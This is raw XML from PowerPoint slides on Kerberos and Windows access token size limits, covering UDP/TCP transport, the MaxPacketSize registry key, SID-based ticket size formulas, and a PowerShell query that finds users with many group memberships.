                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45716" marB="45716"/>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83306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dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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79495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dirty="0"/>
              <a:t>Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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2631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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kerberos and TCP / UDP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RFC 1510 specifies UDP for transport</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS Kerberos adds user credentials to messages, often these exceed 2000 bytes (2012 always TCP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Messages of less than 2000 bytes sent over UDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to force Kerberos to use TCP instead of UDP (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>KB244474</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE\System\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\Control\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>\Kerberos\Parameters\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>MaxPacketSize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257843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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token Size Issues or how many groups are too many?</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It depends...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple different limits and configuration points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group scopes matter… sometimes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do you know what SIDs are really going into your users’ access tokens?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are the limits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos ticket size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS buffer limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access token size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Absolute size limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paged Pool exhaustion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="C:\Users\mreyn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M2931S41\MCj04370930000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="0"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="1219200"/>
            <a:ext cx="4495800" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3733800"/>
            <a:ext cx="4038600" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1518594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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Kerberos Ticket and Access Token size</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Service Ticket bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>~1200+(40_byte_SIDs*40)+(8_bytes_SIDs*8)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User SID takes 40 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global group SIDs take 8 bytes each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Universal group SIDs (same domain as user) take 8 bytes each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Universal group SIDs (different domain in forest from user) take 40 bytes each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain local group SIDs take 40 bytes each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All SID History SIDs take 40 bytes each</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note delegation may double ticket size (not always)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Base 64 encoding increases ticket size in requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Absolute limit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1024 SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1015 Recommended Max</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page Pool stress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impacts resource servers with concurrent users and connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="C:\Users\mreyn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M2931S41\MCj04370930000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="0"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113087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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Access Token size</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="C:\Users\mreyn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M2931S41\MCj04370930000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="0"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Chart 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41490423"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1447800"/>
          <a:ext cx="8534400" cy="464549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5150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The maximum PAC size a Kerberos ticket can transport</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="4970591"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size == Kerberos receive buffer that contains the SIDs that represent the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MaxTokenGroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in which the account is a member of (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>KB327825</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This is different of  “Max Access Token Size” (where the hard-coded limit of  SIDs for this token is 1.015).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>TokenSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = Overhead + (n * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SizeOfGlobalGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) + (n * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SizeOfLocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>UniversalGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> + (n * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SizeOfSidHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) [ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>SizeOfTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>500 Domain Local Groups + 100 Global Groups in a non-delegation scenario : 1.200 + (500 * 40) + (100 * 8) = 22.000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>700 Domain Local Groups + 200 Global Groups in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>delegation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scenario : 1.200 + (700 * 40) + (200 * 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>* 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 59.200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Getting a list of users that is about to reach the limit of 1.015 groups memberships:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Filter * | Select-Object -First 10 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForEach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-Object { $_ | Add-Member -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MemberType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NoteProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GroupCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Value ($_ | Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADAccountAuthorizationGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).Count -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PassThru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -Force } | Where-Object { $_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GroupCount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gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 500 }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations and common registry settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116178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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What’s in my ticket / token?</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGT stage expansion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User’s SID History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Primary Group SID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Primary Group SID History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
